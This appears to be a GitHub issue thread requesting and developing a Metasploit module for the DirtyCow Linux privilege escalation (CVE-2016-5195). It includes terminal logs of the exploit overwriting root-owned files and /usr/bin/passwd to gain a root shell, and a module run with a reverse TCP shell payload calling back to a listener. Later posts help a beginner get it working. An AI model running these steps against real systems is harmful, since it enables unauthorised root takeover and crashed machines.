Module Request: Linux Local CVE-2016-5195 (dirtycow)

[jvoisin]

CVE-2016-5195 (aka DirtyCow) is an interesting privesc, with a PoC available.

The interesting part is that the exploit is super-reliable, and bypasses everything: grsecurity, selinux, smack, … and it affects kernels since 2.6.22

[nixawk]

sec@lab:~/CVE-2016-5195-dirtycow$ cat /etc/issue
Ubuntu 14.04.4 LTS \n \l


sec@lab:~/CVE-2016-5195-dirtycow$ sudo -s
[sudo] password for sec: 
root@lab:~/CVE-2016-5195-dirtycow# echo "Hello CVE-2016-5195" > foo
root@lab:~/CVE-2016-5195-dirtycow# chmod 0404 foo
root@lab:~/CVE-2016-5195-dirtycow# exit
exit
sec@lab:~/CVE-2016-5195-dirtycow$ cat foo 
Hello CVE-2016-5195
sec@lab:~/CVE-2016-5195-dirtycow$ gcc -pthread dirtyc0w.c -o dirtyc0w
sec@lab:~/CVE-2016-5195-dirtycow$ ./dirtyc0w foo hi....
mmap 0x7f8029168000

madvise 0

procselfmem 600000000

sec@lab:~/CVE-2016-5195-dirtycow$ cat foo
hi....CVE-2016-5195

• https://access.redhat.com/security/cve/cve-2016-5195
• https://bugzilla.redhat.com/show_bug.cgi?id=1384344
• https://security-tracker.debian.org/tracker/CVE-2016-5195
• http://www.v3.co.uk/v3-uk/news/2474845/linux-users-urged-to-protect-against-dirty-cow-security-flaw
• https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
• https://lkml.org/lkml/2016/10/19/860
• https://dirtycow.ninja
• https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
• https://twitter.com/DirtyCOWVuln
• http://www.openwall.com/lists/oss-security/2016/10/21/1

[h00die]

I got a pentest right now, and am working on the ipv6_tables priv esc, up for grabs!

[anantshri]

just a note for whosoever tries this out. the action is limited to the size of the file. so your overwriting payload should be within the size of the existing file.

vagrant@wheezy-amd64:~# ls -l /home/vagrant/rootown
-rw-r--r-- 1 root root 4 Oct 21 07:51 /home/vagrant/rootown

vagrant@wheezy-amd64:~$ cat rootown
CALLvagrant@wheezy-amd64:~$ ./test /home/vagrant/rootown "MEMINE"
mmap d0dad000

madvise 0

procselfmem 600000000

vagrant@wheezy-amd64:~$ cat rootown
MEMIvagrant@wheezy-amd64:~$

Not sure if its critical info but something where i wasted some time. don't want another person to waste time on that issue.

[sempervictus]

If nobody else has time today, i can port it this evening. Currently trying to divine cleanup approach:
Thinking we read original contents into memory, write payload + NOP buffer to original size into the CoW mapping, exec the resulting bin, then write back the original memory contents into the payload+buffer sized file (since we cant write more than the filesize and need to stuff the original contents back).

[wvu]

fuck@ubuntu:~$ ./cowroot 
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 51224
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu:/home/fuck# 

[nixawk]

I've created a demo for DirtyCow privilege escalation, but it need more tests.

msf exploit(dirtycow) > show options

Module options (exploit/linux/local/dirtycow):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      6                yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Payload options (linux/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.101    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux x64


msf exploit(dirtycow) > set SESSION 7
SESSION => 7
msf exploit(dirtycow) > run

[*] Started reverse TCP handler on 192.168.1.101:4444
[*] Compiling /tmp/QSjHhucDLS.c via gcc
[*] Starting the payload handler...
[*] Executing at 2016-10-22 07:50:28 -0500.  May take up to 10min for callback
[*] Command shell session 8 opened (192.168.1.101:4444 -> 192.168.1.100:46051) at 2016-10-22 07:50:29 -0500

[h00die]

I see no PRs :(
Who writes a linux local module that uses gcc to compile live on target?! This is crazy talk #sarcasm

[nixawk]

@jvoisin @wvu-r7 @sempervictus @anantshri @h00die CVE-2016-5195 - DirtyCow privilege escalation.

• OS will be down when the root session is gained.

[kthemis]

therer is always an error"Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION."

[pbarry-r7]

@kthemis, did you have a valid session before attempting to use dirtycow? You'll need to have a working session on the target before attempting to escalate privilege, and set the module's SESSION option value to that working session number.

[kthemis]

@pbarry-r7 Is there any way to get the session ID?

[wvu]

@kthemis: Seems like you don't have a shell. Get one.

[kthemis]

@pbarry-r7 If I have a "www-data" shell,what's next？

[pbarry-r7]

@kthemis, the msfconsole sessions command will show what active sessions (and their associated numbers) there are.

[kthemis]

Oh,pretty good.But there was a new error~~
”[!] This exploit may require manual cleanup of '/tmp/xRROLBfdwS' on the target
[!] This exploit may require manual cleanup of '/tmp/xRROLBfdwS.out' on the target“ @pbarry-r7

[wvu]

@kthemis: See if those files still exist. If they do, delete them. Looks like FileDropper is failing for any number of potential reasons. (Yes, it's that finicky.)

[kthemis]

There is just only one C file in the targert directory. @wvu-r7

[wvu]

@kthemis: Maybe you don't have GCC. ¯_(ツ)_/¯

[kthemis]

Thanks a lot ,I'm just a beginner:).But now I hvae an another error:"Exploit failed: Rex::TimeoutError Operation timed out" @wvu-r7

[wvu]

@kthemis: Is your session still up?

[kthemis]

Yes,my session is still up.But when a new session created,I can't get a meterpreter shell.
It also can find that the target machine has been down. @wvu-r7

[kthemis]

I have tried to use the latest dirtycow.rb,but there is still a error:

And then,the target machine is dead!!!!!!!!!